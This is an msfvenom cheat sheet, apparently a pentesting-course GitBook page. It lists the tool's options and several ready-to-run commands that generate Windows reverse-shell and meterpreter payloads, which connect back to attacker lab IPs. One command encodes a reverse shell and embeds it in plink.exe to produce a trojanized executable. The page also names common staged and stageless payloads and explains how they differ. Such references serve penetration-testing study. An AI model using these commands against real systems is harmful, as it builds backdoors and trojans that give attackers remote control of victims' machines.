# Msfvenom

![](https://2774131807-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M64VB6Sr653y4KPdauj%2F-M6G5gqO4VvhohFFsFeV%2F-M6G6PsGaChKqfm0jQCk%2FMSFvenom1.jpg?alt=media\&token=48fcb5c1-7b8d-4753-a708-cafb996f2e4a)

### Command Options

```
-p, --payload: Payload to use. Specify a '-' or stdin to use custom payloads
-b, --bad-chars: The list of characters to avoid
-f, --format: Output format
-a, --arch: The architecture to use
--platform: The platform of the payload
-v, --var-name: Specify a custom variable name to use for certain output formats
-e, --encoder: The encoder to use
```

{% embed url="<https://www.offensive-security.com/metasploit-unleashed/msfvenom/>" %}

### Examples of Usage

```
msfvenom -l payloads | grep x86
# List paylaods

msfvenom -p windows/shell_reverse_tcp --list-options
# Display paylaod options 

msfvenom -a x86 --platform windows -p windows/shell_reverse_tcp LHOST=10.11.0.75 LPORT=4444 -f asp -o tcp_shell.asp

msfvenom -a x86 --platform windows -p windows/shell_reverse_tcp LHOST=10.11.0.75 LPORT=1234 -f exe -o tcp_shell.exe

msfvenom -p windows/shell_reverse_tcp LHOST=10.11.0.5 LPORT=4444 -f exe -o shell_reverse.exe

msfvenom -p windows/shell_reverse_tcp LHOST=10.11.0.5 LPORT=4444 -f exe -e x86/shikata_ga_nai -i 9 -x /usr/share/windows-binaries/plink.exe -o shell_reverse_msf_encoded_embedded.exe
#PEファイルへのinjection

msfvenom -p windows/meterpreter/reverse_https LHOST=10.11.0.5 LPORT=443 -f exe -o met_https_reverse.exe
```

### List of commonly used payloads

```
<Staged>
windows/shell/reverse_tcp  
windows/x64/shell/reverse_tcp
windows/meterpreter/reverse_tcp 
windows/x64/meterpreter/reverse_tcp

<Stageless>
windows/shell_reverse_tcp
windows/x64/shell_reverse_tcp
windows/meterpreter_reverse_tcp 
windows/x64/meterpreter_reverse_tcp
```

### Staged vs Stageless payloads

> Staged payloads are denoted with the use of a forward slash (**/**; e.g. **windows/shell/reverse\_tcp**). Staged payloads send a small stager to the target, which connects back to the attacker and downloads the rest of the payload. Therefore, staged payloads need special payload listeners, such as **multi/handler** in Metasploit. Staged payloads are ideal in situations where you have limited shellcode space, most commonly in Buffer Overflows (but that’s a story for another day)
>
> Stageless payloads are denoted with the use of an underscore (**\_**; e.g. **windows/shell\_reverse\_tcp**). Stageless payloads send the entire payload to the target at once, and therefore don’t require the attacker to provide more data. That means we have a variety of listeners we can use, such as Netcat. Find out how to set up a listener using Netcat/Ncat in my post [here](https://medium.com/@PenTest_duck/offensive-netcat-ncat-from-port-scanning-to-bind-shell-ip-whitelisting-834689b103da?source=friends_link\&sk=774174bfcb283864cf4468d2db460d0e).

{% embed url="<https://medium.com/@PenTest_duck/offensive-msfvenom-from-generating-shellcode-to-creating-trojans-4be10179bb86>" %}

### Link

{% embed url="<https://www.hackingarticles.in/msfvenom-tutorials-beginners/>" %}

{% embed url="<https://www.hackingarticles.in/generating-reverse-shell-using-msfvenom-one-liner-payload/>" %}

{% embed url="<https://github.com/rapid7/metasploit-framework/wiki/How-to-use-msfvenom>" %}

{% embed url="<https://netsec.ws/?p=331>" %}